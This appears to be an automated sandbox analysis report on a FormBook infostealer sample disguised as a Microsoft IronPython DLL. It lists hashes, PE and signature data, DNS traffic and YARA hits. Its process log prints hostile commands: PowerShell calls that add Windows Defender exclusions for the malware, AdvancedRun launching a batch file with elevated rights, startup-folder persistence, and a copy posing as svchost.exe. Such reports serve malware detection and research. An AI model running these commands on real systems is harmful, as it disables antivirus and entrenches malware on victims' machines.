                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915085335..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..Process ID: 6392..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915085335..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RYhdmjjr94.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915085652..Username: computer\user..RunAs User: computer\a
                                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):55
                                                                                      Entropy (8bit):4.306461250274409
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):6.324012336357782
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:RYhdmjjr94.exe
                                                                                      File size:1053624
                                                                                      MD5:44696d252000850d3ea71d9ae238aedc
                                                                                      SHA1:1fb61a1df500f9025641526cb4013d555b129a84
                                                                                      SHA256:1b39d6bf218028dfe7bc8254a3b1682804e9bf05b8298c708c318236f64ad986
                                                                                      SHA512:e1115a0a70b6d532633c1c60733a2aebbdc9e14863deaec7f6e15604c20f9f3ce3d36132ec2b814a4c774b25a6c4c8ccad4003724b98abead2be3f752b9d6314
                                                                                      SSDEEP:12288:M1VPzxljWH+fdg8yXresMdJFBwA48ayWMWPX6+Pqpn7PJuhgqCakBu7:yzxljW+g3Xub48ayWlK+ipnLJuhVkA7
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..............0.................. ... ....@.. .......................`............`................................

                                                                                      File Icon

                                                                                      Icon Hash:00828e8e8686b000

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x5012ce
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:true
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                      Time Stamp:0x5E8F89C0 [Thu Apr 9 20:46:56 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Authenticode Signature

                                                                                      Signature Valid:false
                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                      Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                                                                                      Error Number:-2146762495
                                                                                      Not Before:7/7/2021 5:00:00 PM
                                                                                      Not After:7/8/2022 4:59:59 PM
                                                                                      Subject Chain
                                                                                      • CN=Afia Wave Enterprises Oy, O=Afia Wave Enterprises Oy, L=Helsinki, S=Uusimaa, C=FI
                                                                                      Version:3
                                                                                      Thumbprint MD5:4D53204310277C51FA444D3365AA03EB
                                                                                      Thumbprint SHA-1:9B6F3B3CD33AE938FBC5C95B8C9239BAC9F9F7BF
                                                                                      Thumbprint SHA-256:999BBF99F3B3C1A894340918D8F2C6A358E7EC6299BAB5D8FD6B9E7570ABF929
                                                                                      Serial:69AD1E8B5941C93D5017B7C3FDB8E7B6

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]

                                                                                      Data Directories

                                                                                      Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT          0x101204         0x4a          .text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE        0x102000         0x544         .rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY        0xffe00          0x15b8
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC       0x104000         0xc           .reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG           0x10124e         0x1c          .text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
.text   0x2000           0xff2d4       0xff400   False     0.536390104677   data       6.31812419802    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x102000         0x544         0x600     False     0.350260416667   data       3.72045311112    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x104000         0xc           0x200     False     0.044921875      data       0.0980041756627  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA       Size   Type  Language  Country
RT_GROUP_ICON  0x1020a0  0x6    data
RT_VERSION     0x1020a8  0x49a  data

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Microsoft Corporation
Assembly Version  16.0.0.0
InternalName      Microsoft.PythonTools.IronPython.dll
FileVersion       16.6.20100.1
CompanyName       Microsoft Corporation
Comments          Provides templates and integration for IronPython-based projects.
ProductName       Python support for Microsoft Visual Studio
ProductVersion    16.6.20100.1
FileDescription   Visual Studio - IronPython support
OriginalFilename  Microsoft.PythonTools.IronPython.dll

Network Behavior

Network Port Distribution

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 15, 2021 08:53:06.077810049 CEST  65447        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:53:06.112370968 CEST  53           65447      8.8.8.8      192.168.2.5
Sep 15, 2021 08:53:20.022248030 CEST  52441        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:53:20.051691055 CEST  53           52441      8.8.8.8      192.168.2.5
Sep 15, 2021 08:53:57.942164898 CEST  62176        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:53:57.978177071 CEST  53           62176      8.8.8.8      192.168.2.5
Sep 15, 2021 08:54:17.505590916 CEST  59596        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:54:17.550008059 CEST  53           59596      8.8.8.8      192.168.2.5
Sep 15, 2021 08:54:32.761794090 CEST  65296        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:54:32.797377110 CEST  53           65296      8.8.8.8      192.168.2.5
Sep 15, 2021 08:55:26.078685999 CEST  63183        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:55:26.113998890 CEST  53           63183      8.8.8.8      192.168.2.5
Sep 15, 2021 08:55:29.450730085 CEST  60151        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:55:29.478764057 CEST  53           60151      8.8.8.8      192.168.2.5
Sep 15, 2021 08:55:36.228642941 CEST  56969        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:55:36.255779982 CEST  53           56969      8.8.8.8      192.168.2.5
Sep 15, 2021 08:55:38.369191885 CEST  55161        53         192.168.2.5  8.8.8.8
Sep 15, 2021 08:55:38.402147055 CEST  53           55161      8.8.8.8      192.168.2.5

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 08:53:12
Start date: 15/09/2021
Path: C:\Users\user\Desktop\RYhdmjjr94.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\RYhdmjjr94.exe'
Imagebase: 0x1e0000
File size: 1053624 bytes
MD5 hash: 44696D252000850D3EA71D9AE238AEDC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.407421207.0000000003B13000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.504065337.0000000003AB3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.507226392.0000000003B13000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000000.407100125.0000000003AB3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 08:53:15
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:53:18
Start date: 15/09/2021
Path: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 08:53:21
Start date: 15/09/2021
Path: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
Imagebase: 0x400000
File size: 91000 bytes
MD5 hash: 17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 08:53:24
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:53:25
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:53:26
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
Imagebase: 0x1110000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 08:53:28
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:53:29
Start date: 15/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 08:53:30
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
Imagebase: 0x1110000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 08:53:30
Start date: 15/09/2021
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Imagebase: 0x7ff797770000
File size: 51288 bytes
MD5 hash: 32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language

General

Start time: 08:53:31
Start date: 15/09/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 08:53:31
Start date: 15/09/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
Imagebase: 0x1110000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:31
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:33
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:34
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:35
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:37
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:38
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                                                                                      Imagebase:0xb30000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:40
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:40
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                      Imagebase:0x7ff797770000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:42
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:42
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:46
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                                                                                      Imagebase:0x1110000
                                                                                      File size:430592 bytes
                                                                                      MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:48
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                                                                                      Imagebase:0x1f0000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET

                                                                                      General

                                                                                      Start time:08:53:50
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:53:59
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                      Imagebase:0x8a0000
                                                                                      File size:55400 bytes
                                                                                      MD5 hash:17CC69238395DF61AAF483BCEF02E7C9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language

                                                                                      General

                                                                                      Start time:08:54:02
                                                                                      Start date:15/09/2021
                                                                                      Path:C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\Public\Documents\2FDD6624\svchost.exe'
                                                                                      Imagebase:0x330000
                                                                                      File size:1053624 bytes
                                                                                      MD5 hash:44696D252000850D3EA71D9AE238AEDC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Antivirus matches:
                                                                                      • Detection: 46%, Virustotal
                                                                                      • Detection: 23%, Metadefender
                                                                                      • Detection: 51%, ReversingLabs

